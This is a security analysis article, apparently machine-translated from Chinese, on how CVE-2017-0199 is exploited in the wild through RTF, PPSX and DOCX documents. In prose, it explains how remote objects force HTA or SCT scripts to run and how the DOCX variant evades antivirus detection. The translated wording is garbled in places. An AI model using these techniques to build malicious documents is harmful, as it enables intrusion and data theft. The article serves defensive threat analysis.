Office of the senior threat vulnerability in the wild use analysis-vulnerability warning-the black bar safety net

Office of the senior threat vulnerability background
In the advanced threat attack, the hackers remote delivery invasion client the most like the vulnerability is office documents vulnerability in the just-concluded black hat conference, the best client security vulnerabilities award went to CVE-2017-0199 vulnerability, this vulnerability is nowadays office vulnerability areas most popular security vulnerabilities, the best client security vulnerabilities of this honor attributed to Ryan Hanson, And Haifei li, Bing Sun and unknown hacker.

! [](/Article/UploadPic/2017-8/2017881861997. png? www. myhack58. com)
CVE-2017-0199 is the Office series of Office software in a logical vulnerability, and a conventional memory corruption-type vulnerabilities is different, this type of vulnerability without the complexity of using the technique, directly in office a document to run arbitrary malicious script, use stable and reliable. Microsoft in year 4 on security updates for CVE-2017-0199 vulnerabilities were fixed, but the security patch of the repair and Defense can still be bypassed, in 7 on Microsoft’s security update also fixes the same type of new Vulnerability, CVE-2017-8570。 In Syscan360 2017 Seattle Safety meeting, Haifei li and Bing Sun of the topic of the Moniker magic: direct in Microsoft Office, run the script on a detailed analysis of such vulnerability in principle, this article will not repeat them here, the following began to focus on the analysis of these vulnerabilities in the wild exploit.
The wild use of the first RTF version
CVE-2017-0199 vulnerabilities in the first time been disclosed, the wild the earliest use of the sample is in word document form for dissemination use, because office document suffix is associated with the loose parsing features, change other document extension, the attack can still be successful, so the wild use most of the malicious document the true File format is RTF, but the malicious document extension is doc, docx, etc. suffix, the attack has a strong camouflage to deceive the characteristics. In the wild use the sample file format has a keyword section objupdate, and the role of this field is automatically updated to the object, when the victim open the office document when it loads the remote URL object on the remote server to trigger an HTTP request, a malicious Server against the client’s http request to force the return Content-type to application/hta response, and ultimately the client office processes the remote file is downloaded as a hta script is run, the entire attack process is stable and does not require victims of any interaction.

! [](/Article/UploadPic/2017-8/2017881861193. png? www. myhack58. com)
The wild use of the second PPSX version
Since the RTF version of the exploit a lot use, the home security software detection rates are also relatively high, the attacker began to turn to another kind of office document formats for an attack, the attacker found the ppsx format of a slides document can also be no interaction to trigger the vulnerability, the use of the principle is to use the slide animation event, when the slide some of the predefined trigger event may be triggered automatically lead to exploits.
The following figure, a popular attack samples embedded in malicious animation event:

! [](/Article/UploadPic/2017-8/2017881862289. png? www. myhack58. com)
The event will be associated with a olelink object, the principle is similar to the rtf version of the following xml in the fields.

! [](/Article/UploadPic/2017-8/2017881862532. png? www. myhack58. com)
But the object will be embedded with a script Protocol header of the remote address, and the url address of the XML file is a malicious sct script.

! [](/Article/UploadPic/2017-8/2017881862929. png? www. myhack58. com)
When the victims open the malicious slide the document will automatically load a remote URL object on the remote server to initiate an HTTP request to download the file to local, and ultimately the client office processes will be downloaded to the local file as the sct script execution.
Latest popular third a DOCX version
Recently we found a part of the real File format is Docx format document added CVE-2017-0199 exploit, the attacker very cleverly CVE-2017-0199 vulnerability in the RTF file as a source embedded into the Docx document format, so that the resulting docx file when opened is automatically go to remote access contain 0199 vulnerability in the rtf file, and then trigger behind a series of attacks, such attacks increased the security software Avira difficulty, some antivirus software without noticed!
The following figure, we will find docx format document embed a remote document object:

! [](/Article/UploadPic/2017-8/2017881862940. png? www. myhack58. com)
With a document open, it will automatically open a remote malicious RTF files!

! [](/Article/UploadPic/2017-8/2017881862112. png? www. myhack58. com)
We can see in the wild use the RTF sample in the VT detection rate to 31/59 In.

! [](/Article/UploadPic/2017-8/2017881862507. png? www. myhack58. com)
And the latest popular DOCX version of the detection rate is only 5/59 In.

! [](/Article/UploadPic/2017-8/2017881862829. png? www. myhack58. com)
The latest discovery of the“Oolong”sample
Last week we in the outside world found a lot of examples labeled as CVE-2017-8570 office slide document malicious sample, while there are vendors claimed that the first time to capture the latest office vulnerability, but after analysis we found that the sample is still CVE-2017-0199 vulnerability in the wild using the second PPSX version, by a typical example of the sample analysis, we found that the sample use of the payload is Loki Bot theft type of Trojan viruses, together with the targeted theft attacks.

! [](/Article/UploadPic/2017-8/2017881862994. png? www. myhack58. com)

[1] [2] next